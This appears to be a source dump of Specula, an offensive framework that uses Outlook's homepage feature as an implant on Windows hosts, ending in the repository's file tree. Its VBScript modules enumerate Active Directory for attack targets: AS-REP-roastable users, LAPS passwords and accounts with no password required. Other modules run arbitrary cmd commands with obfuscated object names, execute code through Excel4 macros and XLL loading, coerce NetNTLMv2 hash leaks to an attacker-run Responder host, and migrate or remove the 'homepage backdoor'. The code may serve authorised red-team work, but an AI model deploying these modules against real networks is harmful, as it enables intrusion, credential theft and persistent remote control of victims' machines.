under the static path (GUID is always static for the default domain controller policy):
\\\\domain.com\\Sysvol\\domain.com\\Policies\\{6AC1786C-016F-11D2-945F-00C04FB984F9}\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf
It uses WbemScripting.SWbemLocator
- ConnectServer(\\root\\directory\\LDAP)
- Query: SELECT DS_ms_DS_MachineAccountQuota FROM ds_domaindns
It uses Wscript.Shell
- ExpandEnvironmentStrings
It uses Scripting.FileSystemObject
- OpenTextFile
- OpenTextFile().readline
- FileExists
"""
self.entry = 'list_addcomputertodomain'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/ldap/list_addcomputertodomain.txt
================================================
Function list_addcomputertodomain()
On error resume next
Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject")
Set sh = window.external.OutlookApplication.CreateObject("Wscript.Shell")
dom = sh.ExpandEnvironmentStrings("%USERDNSDOMAIN%")
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP")
Returndata = Returndata & "Running query: SELECT DS_ms_DS_MachineAccountQuota FROM ds_domaindns" & vbCrLf
Set colItems = objWMIService.ExecQuery("SELECT DS_ms_DS_MachineAccountQuota FROM ds_domaindns")
For Each PATH in colItems
For Each pathAttribute in PATH.Properties_
Select Case TypeName(pathAttribute.value)
case "String"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Long"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Boolean"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "SWbemObjectEx"
'Cannot get this work...
'Returndata = Returndata & pathAttribute.name & vbCrLf
case "Variant()"
Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf
End Select
Next
Returndata = Returndata & vbCrLf
Next
polpath = "\\" & dom & "\Sysvol\" & dom & "\Policies\{6AC1786C-016F-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
Set f = fs.OpenTextFile(polpath, 1, False, True)
If fs.FileExists( polpath ) Then
Do While f.AtEndOfStream = False
strLine = f.readline
if InStr(strLine, "SeMachineAccountPrivilege") > 0 Then
Returndata = Returndata & "Found SeMachineAccountPrivilege entry in default domain controller policy at path" & vbCrLf
Returndata = Returndata & polpath & vbCrLf
Returndata = Returndata & "Entry: "
Returndata = Returndata & strLine & vbCrLf
end if
loop
f.close
else
Returndata = Returndata & "Could not find default domain controller policy at path" & vbCrLf
Returndata = Returndata & polpath & vbCrLf
end if
list_addcomputertodomain = Returndata
End Function
================================================
FILE: functions/enumerate/ldap/list_asreproast.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates all users from Active Directory that has the --Do Not Require Kerberos Pre-authentication-- set.
It returns the sAMAccountName, ADSIPath and the useraccountcontrol value
It uses WbemScripting.SWbemLocator
- ConnectServer(\\root\\directory\\LDAP)
- Query: SELECT DS_userAccountControl,DS_samaccountname FROM ds_user Where DS_userAccountControl >= 4194304
"""
self.entry = 'list_asreproast'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/ldap/list_asreproast.txt
================================================
Function list_asreproast()
On error resume next
Const DONT_REQUIRE_PREAUTH = 4194304
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP")
Returndata = Returndata & "Running query: " & "SELECT DS_userAccountControl,DS_samaccountname FROM ds_user Where DS_userAccountControl >= 4194304" & vbCrLf
Set colItems = objWMIService.ExecQuery("SELECT DS_userAccountControl,DS_samaccountname FROM ds_user Where DS_userAccountControl >= 4194304")
For Each PATH in colItems
For Each pathAttribute in PATH.Properties_
Select Case TypeName(pathAttribute.value)
case "Long"
if DONT_REQUIRE_PREAUTH and pathAttribute.value Then
Returndata = Returndata & PATH.ADSIPath & vbCrLf
Returndata = Returndata & "Samaccountname: " & PATH.DS_samaccountname & vbCrLf
Returndata = Returndata & "DONT_REQUIRE_PREAUTH enabled" & vbCrLf
Returndata = Returndata & "UserAccountControl set to: " & PATH.DS_userAccountControl & vbCrLf
Returndata = Returndata & vbCrLf
end if
End Select
Next
Next
list_asreproast = Returndata
End Function
================================================
FILE: functions/enumerate/ldap/list_computer.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates the computer specified in the samaccountName option.
If computer account is found it also enumerates the properties of the account.
If account not found it will say so in the returned data.
Remember to specify with $ in the end.
Like: set samaccountname dc1$
It uses WbemScripting.SWbemLocator
- ConnectServer(\\root\\directory\\LDAP)
- Query: SELECT * FROM ds_computer Where DS_sAMAccountName = VARIABLE
"""
self.entry = 'list_computer'
self.depends = []
self.options['samaccountname'] = {
"value": None,
"required": True,
"description": "samaccountname to retreive information for",
"handler": quotedstring
}
super().__init__(templatepath)
================================================
FILE: functions/enumerate/ldap/list_computer.txt
================================================
Function list_computer()
On error resume next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP")
Returndata = Returndata & "Running query: " & "SELECT * FROM ds_computer Where DS_sAMAccountName = '" & {{samaccountname}} & "'" & vbCrLf
Set colItems = objWMIService.ExecQuery("SELECT * FROM ds_computer Where DS_sAMAccountName = '" & {{samaccountname}} & "'")
if Not colItems.count <= 0 then
Returndata = Returndata & "samaccountname lookup successful:" & vbCrLf
For Each PATH in colItems
For Each pathAttribute in PATH.Properties_
Select Case TypeName(pathAttribute.value)
case "String"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Long"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Boolean"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "SWbemObjectEx"
'Cannot get this work...
'Returndata = Returndata & pathAttribute.name & vbCrLf
case "Variant()"
Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf
End Select
Next
Next
else
Returndata = Returndata & {{samaccountname}} & " not found" & vbCrLf
end if
list_computer = Returndata
End Function
================================================
FILE: functions/enumerate/ldap/list_computers.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates all computers from Active Directory.
It returns the sAMAccountName
It uses WbemScripting.SWbemLocator
- ConnectServer(\\root\\directory\\LDAP)
- Query: SELECT DS_sAMAccountName FROM ds_computer
"""
self.entry = 'list_computers'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/ldap/list_computers.txt
================================================
Function list_computers()
On error resume next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP")
Returndata = Returndata & "Running query: " & "SELECT DS_sAMAccountName FROM ds_computer" & vbCrLf
Set colItems = objWMIService.ExecQuery("SELECT DS_sAMAccountName FROM ds_computer")
For Each PATH in colItems
For Each pathAttribute in PATH.Properties_
Select Case TypeName(pathAttribute.value)
case "String"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Long"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Boolean"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "SWbemObjectEx"
'Cannot get this work...
'Returndata = Returndata & pathAttribute.name & vbCrLf
case "Variant()"
Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf
End Select
Next
Returndata = Returndata & vbCrLf
Next
list_computers = Returndata
End Function
================================================
FILE: functions/enumerate/ldap/list_domaininfo.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates Top level information from the specified domain in the Domain option.
It uses WbemScripting.SWbemLocator
- ConnectServer(\\root\\directory\\LDAP)
- Query: SELECT * FROM ds_domaindns
"""
self.entry = 'list_domaininfo'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/ldap/list_domaininfo.txt
================================================
Function list_domaininfo()
On error resume next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP")
Returndata = Returndata & "Running query: SELECT * FROM ds_domaindns" & vbCrLf
Set colItems = objWMIService.ExecQuery("SELECT * FROM ds_domaindns")
For Each PATH in colItems
For Each pathAttribute in PATH.Properties_
Select Case TypeName(pathAttribute.value)
case "String"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Long"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Boolean"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "SWbemObjectEx"
'Cannot get this work...
'Returndata = Returndata & pathAttribute.name & vbCrLf
case "Variant()"
Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf
End Select
Next
Returndata = Returndata & vbCrLf
Next
list_domaininfo = Returndata
End Function
================================================
FILE: functions/enumerate/ldap/list_lapspassword.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates the LAPS passwords in the current domain.
It uses WbemScripting.SWbemLocator
- ConnectServer(\\root\\directory\\LDAP)
- Query: SELECT DS_ms_Mcs_AdmPwd,DS_sAMAccountName,DS_ms_Mcs_AdmPwdExpirationTime FROM ds_computer Where DS_ms_Mcs_AdmPwd != NULL
"""
self.entry = 'list_lapspassword'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/ldap/list_lapspassword.txt
================================================
Function list_lapspassword()
On error resume next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP")
Returndata = Returndata & "Running query: " & "SELECT DS_ms_Mcs_AdmPwd FROM ds_computer Where DS_ms_Mcs_AdmPwd != NULL" & vbCrLf
Set colItems = objWMIService.ExecQuery("SELECT DS_ms_Mcs_AdmPwd,DS_sAMAccountName,DS_ms_Mcs_AdmPwdExpirationTime FROM ds_computer Where DS_ms_Mcs_AdmPwd != NULL")
For Each PATH in colItems
For Each pathAttribute in PATH.Properties_
Select Case TypeName(pathAttribute.value)
case "String"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Long"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Boolean"
Returndata = Returndata & pathAttribute.name & "BOOL:" & pathAttribute.value & vbCrLf
case "SWbemObjectEx"
'Cannot get this work...
'Returndata = Returndata & pathAttribute.name & vbCrLf
case "Variant()"
Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf
End Select
Next
Returndata = Returndata & vbCrLf
Next
list_lapspassword = Returndata
End Function
================================================
FILE: functions/enumerate/ldap/list_passwordnotrequired.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates all users from Active Directory that has the --Does not require password-- set.
It returns the sAMAccountName, ADSIPath and the useraccountcontrol value
It uses WbemScripting.SWbemLocator
- ConnectServer(\\root\\directory\\LDAP)
- Query: SELECT DS_userAccountControl,DS_samaccountname FROM ds_user Where DS_userAccountControl >= 32
"""
self.entry = 'list_passwordnotrequired'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/ldap/list_passwordnotrequired.txt
================================================
Function list_passwordnotrequired()
On error resume next
Const PASSWD_NOTREQD = 32
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP")
Returndata = Returndata & "Running query: " & "SELECT DS_userAccountControl,DS_samaccountname FROM ds_user Where DS_userAccountControl >= 32" & vbCrLf
Set colItems = objWMIService.ExecQuery("SELECT DS_userAccountControl,DS_samaccountname FROM ds_user Where DS_userAccountControl >= 32")
For Each PATH in colItems
For Each pathAttribute in PATH.Properties_
Select Case TypeName(pathAttribute.value)
case "Long"
if PASSWD_NOTREQD and pathAttribute.value Then
Returndata = Returndata & PATH.ADSIPath & vbCrLf
Returndata = Returndata & "Samaccountname: " & PATH.DS_samaccountname & vbCrLf
Returndata = Returndata & "PASSWD_NOTREQD enabled" & vbCrLf
Returndata = Returndata & "UserAccountControl set to: " & PATH.DS_userAccountControl & vbCrLf
Returndata = Returndata & vbCrLf
end if
End Select
Next
Next
list_passwordnotrequired = Returndata
End Function
================================================
FILE: functions/enumerate/ldap/list_passwordpolicy.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates the password policy from the current domain.
It uses WbemScripting.SWbemLocator
- ConnectServer(\\root\\directory\\LDAP)
- Query: SELECT DS_pwdProperties,DS_minPwdAge,DS_maxPwdAge,DS_minPwdLength,DS_lockoutThreshold,DS_lockoutDuration,DS_lockOutObservationWindow,DS_pwdHistoryLength FROM ds_domaindns
"""
self.entry = 'list_passwordpolicy'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/ldap/list_passwordpolicy.txt
================================================
Function list_passwordpolicy()
On error resume next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP")
Returndata = Returndata & "Running query: " & "SELECT DS_pwdProperties,DS_minPwdAge,DS_maxPwdAge,DS_minPwdLength,DS_lockoutThreshold,DS_lockoutDuration,DS_lockOutObservationWindow,DS_pwdHistoryLength FROM ds_domaindns" & vbCrLf
Set colItems = objWMIService.ExecQuery("SELECT DS_pwdProperties,DS_minPwdAge,DS_maxPwdAge,DS_minPwdLength,DS_lockoutThreshold,DS_lockoutDuration,DS_lockOutObservationWindow,DS_pwdHistoryLength FROM ds_domaindns")
For Each PATH in colItems
For Each pathAttribute in PATH.Properties_
Select Case TypeName(pathAttribute.value)
case "String"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Long"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Boolean"
Returndata = Returndata & pathAttribute.name & "BOOL:" & pathAttribute.value & vbCrLf
case "SWbemObjectEx"
'Cannot get this work...
'Returndata = Returndata & pathAttribute.name & vbCrLf
case "Variant()"
Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf
End Select
Next
Returndata = Returndata & vbCrLf
Next
list_passwordpolicy = Returndata
End Function
================================================
FILE: functions/enumerate/ldap/list_user.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates the user specified in the samaccountName option.
If user account is found it also enumerates the properties of the account.
If account not found it will say so in the returned data
It uses WbemScripting.SWbemLocator
- ConnectServer(\\root\\directory\\LDAP)
- Query: SELECT * FROM ds_user Where DS_sAMAccountName = VARIABLE
"""
self.entry = 'list_user'
self.depends = []
self.options['samaccountname'] = {
"value": None,
"required": True,
"description": "samaccountname to retreive information for",
"handler": quotedstring
}
super().__init__(templatepath)
================================================
FILE: functions/enumerate/ldap/list_user.txt
================================================
Function list_user()
On error resume next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP")
Returndata = Returndata & "Running query: " & "SELECT * FROM ds_user Where DS_sAMAccountName = '" & {{samaccountname}} & "'" & vbCrLf
Set colItems = objWMIService.ExecQuery("SELECT * FROM ds_user Where DS_sAMAccountName = '" & {{samaccountname}} & "'")
if Not colItems.count <= 0 then
Returndata = Returndata & "samaccountname lookup successful:" & vbCrLf
For Each PATH in colItems
For Each pathAttribute in PATH.Properties_
Select Case TypeName(pathAttribute.value)
case "String"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Long"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Boolean"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "SWbemObjectEx"
'Cannot get this work...
'Returndata = Returndata & pathAttribute.name & vbCrLf
case "Variant()"
Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf
End Select
Next
Next
else
Returndata = Returndata & {{samaccountname}} & " not found" & vbCrLf
end if
list_user = Returndata
End Function
================================================
FILE: functions/enumerate/ldap/list_users.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates all users from Active Directory.
It returns the sAMAccountName
It uses WbemScripting.SWbemLocator
- ConnectServer(\\root\\directory\\LDAP)
- Query: SELECT DS_sAMAccountName FROM ds_user
"""
self.entry = 'list_users'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/ldap/list_users.txt
================================================
Function list_users()
On error resume next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP")
Returndata = Returndata & "Running query: " & "SELECT DS_sAMAccountName FROM ds_user" & vbCrLf
Set colItems = objWMIService.ExecQuery("SELECT DS_sAMAccountName FROM ds_user")
For Each PATH in colItems
For Each pathAttribute in PATH.Properties_
Select Case TypeName(pathAttribute.value)
case "String"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Long"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Boolean"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "SWbemObjectEx"
'Cannot get this work...
'Returndata = Returndata & pathAttribute.name & vbCrLf
case "Variant()"
Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf
End Select
Next
Returndata = Returndata & vbCrLf
Next
list_users = Returndata
End Function
================================================
FILE: functions/execute/host/application.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Executes the specified COM application hidden.
Application is specified setting the com_application option. It defaults to word.application.
Note that some of the applications starts and immmediatly terminates.
Typical application are:
- word.application
- excel.application
- powerpoint.application
- access.application
- oneNote.application
- publisher.application
Full list of objects can be found using this Powershell oneliner:
gci HKLM:\\Software\\Classes -ea 0| ? {$_.PSChildName -match '^\\w+\\.\\w+$' -and (gp "$($_.PSPath)\\CLSID" -ea 0)} | ft PSChildName
The executed application gets the parent pid of SVCHost.exe (C:\Windows\system32\svchost.exe -k DcomLaunch -p)
It uses CreateObject(Specified com application)
"""
self.entry = 'Execute_Application'
self.depends = []
self.options['com_application'] = {
"value": "word.application",
"required": True,
"description": "COM application to start",
"handler": quotedstring
}
super().__init__(templatepath)
================================================
FILE: functions/execute/host/application.txt
================================================
Function Execute_Application()
On Error Resume Next
Set app = window.external.OutlookApplication.CreateObject({{com_application}})
app.Visible = false
Execute_Application = "Command executed: OutlookApplication.CreateObject(" & {{com_application}} & ")"
End Function
================================================
FILE: functions/execute/host/capture_netntlmv2.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
This module makes a MSXML2.ServerXMLHTTP.6.0 Get request towards the URL specified in the URL option
and you need a responder listening on the address to capture the hash.
Lets say you want to send the client to https://hashcapture.com
set webserver_address hashcapture.com
set url https://hashcapture.com
run
This should give you the netNTLMv2 hash in Responder
If you are able to enable LM/netNTLMv1 support in the OS this can also be used to capture that.
It uses MSXML2.ServerXMLHTTP.6.0
- SetProxy
- setRequestHeader
- open
- send
"""
self.entry = 'capture_netntlmv2'
self.depends = []
self.options['webserver_address'] = {
"value": None,
"required": True,
"description": "Main FQDN/IP of the server without HTTP/HTTPS - ex hashcapture.com",
"handler": quotedstring
}
self.options['url'] = {
"value": None,
"required": True,
"description": "Full url - ex https://hashcapture.com",
"handler": quotedstring
}
self.options['useragent'] = {
"value": None,
"required": False,
"description": "Useragent - Retrieved from DB",
"handler": quotedstring
}
super().__init__(templatepath)
def preprocess(self, agent):
self.options['useragent']['value'] = agent.useragent
================================================
FILE: functions/execute/host/capture_netntlmv2.txt
================================================
Function capture_netntlmv2()
On Error Resume Next
Set oHTTP = window.external.OutlookApplication.CreateObject("MSXML2.ServerXMLHTTP.6.0")
oHTTP.SetProxy 2, {{ webserver_address }}, "*"
oHTTP.setRequestHeader "User-Agent", {{ useragent }}
oHTTP.open "GET", {{ url }}, False
oHTTP.send
End Function
================================================
FILE: functions/execute/host/cmd.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Execute a command via cmd.exe and print any output to the agent log file.
Uses the cmd /c prefix
It uses Wscript.shell
- Run
It uses Scripting.FileSystemObject
- OpenTextFile
- FileExists
- GetSpecialFolder
- GetTempname
- DeleteFile
"""
self.entry = 'Execute_CMD'
self.options['command'] = {
"value": None,
"required": True,
"description": "Command to execute on remote target",
"handler": quotedstring
}
super().__init__(templatepath)
================================================
FILE: functions/execute/host/cmd.txt
================================================
Function Execute_CMD()
On Error Resume Next
Const HIDDEN_WINDOW = 0
Set ws = window.external.OutlookApplication.CreateObject("Wscr" & "ipt.s" & "hell")
Set f = window.external.OutlookApplication.CreateObject("Scri" & "pting.FileSyst" & "emObject")
tmp = f.GetSpecialFolder(2)
fn = f.GetTempName
ff = tmp & "\" & fn
c = "cmd /c " & {{command}} & " > " & ff
ws.Run c, 0, true
if f.FileExists(ff) then
set tf = f.OpenTextFile(ff)
if not tf.atendofstream then
retval = tf.ReadAll
tf.close()
Execute_CMD = "Command executed: " & c & vbCrLf & retval
else
tf.close()
Execute_CMD = "Command: " & c & " returned no data"
end if
f.DeleteFile ff
end if
End Function
================================================
FILE: functions/execute/host/execute_excel4macro.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
This module spawns a new instance of excel and executes ExecuteExcel4Macro to execute provided call.
ExecuteExcel4Macro("CALL(INPUT)")
Example calling Windows API using INPUT:
- set input ""Kernel32"",""GetTickCount"",""J""
- set input ""user32"",""SetCursorPos"",""JJJ"",1,2
Info about the datatypes (J)
B - 8-byte floating-point number (IEEE), Transferred by Value, C type double.
C - Zero (null) terminated string (max. Length = 255 characters), Transferred by Reference, C type char *
F - Zero (null) terminated string (max. Length = 255 characters), Transferred by Reference (modify in place), C type char *
J - 4 bytes wide signed integer, Transferred by Value, C type long int
P - Excel's OPER data structure, Transferred by Reference, C type OPER *
R - Excel's XLOPER data structure, Transferred by Reference, C type XLOPER *
It uses the excel application
- ExecuteExcel4Macro
"""
self.entry = 'execute_excel4macro'
self.depends = []
self.options['input'] = {
"value": None,
"required": True,
"description": "What to execute, remember two double quotes around parameters, see help!",
"handler": quotedstring
}
super().__init__(templatepath)
================================================
FILE: functions/execute/host/execute_excel4macro.txt
================================================
Function execute_excel4macro()
On Error Resume Next
Set excel = window.external.OutlookApplication.CreateObject("Excel.Application")
excel.Visible = false
return_data = excel.ExecuteExcel4Macro("CALL({{input}})")
execute_excel4macro = "Data returned: " & return_data
End Function
================================================
FILE: functions/execute/host/execute_registerxll.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
This module runs the registerxll function in excel, allowing you to execute a DLL(XLL).
XLL file must be on disk, does not work over http. The XLL can be named whatever as extension. (or nothing at all)
For tips on how to create a XLL you can go here:
https://learn.microsoft.com/en-us/office/client-developer/excel/creating-xlls
It uses the excel application
- Registerxll
"""
self.entry = 'execute_registerxll'
self.depends = []
self.options['input'] = {
"value": None,
"required": True,
"description": "Path to xll file on disk",
"handler": quotedstring
}
super().__init__(templatepath)
================================================
FILE: functions/execute/host/execute_registerxll.txt
================================================
Function execute_registerxll()
On Error Resume Next
Set excel = window.external.OutlookApplication.CreateObject("Excel.Application")
excel.Visible = false
return_data = excel.RegisterXLL({{input}})
execute_registerxll = "XLL Executed: " & return_data
End Function
================================================
FILE: functions/execute/host/migrate_homepage.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Migrate agent to another Specula server.
This module sets the URL to a new Specula server.
Useful in situations when you want to change host.
It does NOT move the encrytion key so you must point to the validation url.
!!Remember to have the other server up and running!!
It uses WbemScripting.SWbemLocator
- ConnectServer(root\cimv2)
- ConnectServer(root\cimv2).CreateKey
- ConnectServer(root\cimv2).SetStringValue
- ConnectServer(root\cimv2).SetDWORDValue
"""
self.entry = 'Execute_MigrateHomepage'
self.depends = ['./helperFunctions/Setregvalue_hkcu.txt']
self.options['homepageurl'] = {
"value": None,
"required": True,
"description": "URL to new Specula Homepage validation",
"handler": quotedstring
}
super().__init__(templatepath)
================================================
FILE: functions/execute/host/migrate_homepage.txt
================================================
Function Execute_MigrateHomepage()
On Error Resume Next
version = left(window.external.OutlookApplication.Version,4)
basepath = "software\microsoft\office\" + version + "\outlook\webview\inbox"
SetValue_HKCU_Registry = SetRegValue_HKCU(basepath, "REG_SZ", "URL", {{homepageurl}})
Execute_MigrateHomepage = "Registry updated to point to new Specula server"
End Function
================================================
FILE: functions/execute/host/remove_homepage.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Removes the homepage implant in a nice way :-).
This should be used when you want to remove the homepage backdoor on a host.
It removes the URL registry key as well as the EnableRoamingFolderHomepages.
It uses WbemScripting.SWbemNamedValueSet
- Add.__ProviderArchitecture
- Add.__RequiredArchitecture
It uses Wbem
gitextract_vdz89222/
├── .gitignore
├── CONTRIBUTING.md
├── README.md
├── Taskbooks/
│ ├── enum_installed_software.py
│ └── example.py
├── api/
│ ├── README.md
│ ├── SpeculaApi/
│ │ ├── Sepcula.cpp
│ │ ├── Sepcula.h
│ │ ├── Sepcula.rgs
│ │ ├── SpeculaApi.cpp
│ │ ├── SpeculaApi.def
│ │ ├── SpeculaApi.idl
│ │ ├── SpeculaApi.rc
│ │ ├── SpeculaApi.rgs
│ │ ├── SpeculaApi.vcxproj
│ │ ├── SpeculaApi.vcxproj.filters
│ │ ├── SpeculaApi_i.h
│ │ ├── SpeculaApips.def
│ │ ├── dllmain.cpp
│ │ ├── dllmain.h
│ │ ├── framework.h
│ │ ├── pch.cpp
│ │ ├── pch.h
│ │ ├── resource.h
│ │ └── targetver.h
│ ├── SpeculaApi.sln
│ └── SpeculaApiPS/
│ ├── SpeculaApiPS.vcxproj
│ └── SpeculaApiPS.vcxproj.filters
├── functions/
│ ├── api/
│ │ ├── install_api.py
│ │ ├── install_api.txt
│ │ ├── load_dll.py
│ │ ├── load_dll.txt
│ │ ├── remove_api.py
│ │ ├── remove_api.txt
│ │ ├── run_shell.py
│ │ ├── run_shell.txt
│ │ ├── verify_api.py
│ │ └── verify_api.txt
│ ├── enumerate/
│ │ ├── host/
│ │ │ ├── list_amsiproviders.py
│ │ │ ├── list_amsiproviders.txt
│ │ │ ├── list_applocker.py
│ │ │ ├── list_applocker.txt
│ │ │ ├── list_autoruns.py
│ │ │ ├── list_autoruns.txt
│ │ │ ├── list_basic.py
│ │ │ ├── list_basic.txt
│ │ │ ├── list_boottime.py
│ │ │ ├── list_boottime.txt
│ │ │ ├── list_clipboard.py
│ │ │ ├── list_clipboard.txt
│ │ │ ├── list_environmentvariables.py
│ │ │ ├── list_environmentvariables.txt
│ │ │ ├── list_gpp.py
│ │ │ ├── list_gpp.txt
│ │ │ ├── list_hostsfile.py
│ │ │ ├── list_hostsfile.txt
│ │ │ ├── list_hotfixes.py
│ │ │ ├── list_hotfixes.txt
│ │ │ ├── list_installedapps.py
│ │ │ ├── list_installedapps.txt
│ │ │ ├── list_installeddotnet.py
│ │ │ ├── list_installeddotnet.txt
│ │ │ ├── list_installedpowershell.py
│ │ │ ├── list_installedpowershell.txt
│ │ │ ├── list_iprouting.py
│ │ │ ├── list_iprouting.txt
│ │ │ ├── list_localadmins.py
│ │ │ ├── list_localadmins.txt
│ │ │ ├── list_localusers.py
│ │ │ ├── list_localusers.txt
│ │ │ ├── list_logging.py
│ │ │ ├── list_logging.txt
│ │ │ ├── list_mappeddrives.py
│ │ │ ├── list_mappeddrives.txt
│ │ │ ├── list_networkcardinfo.py
│ │ │ ├── list_networkcardinfo.txt
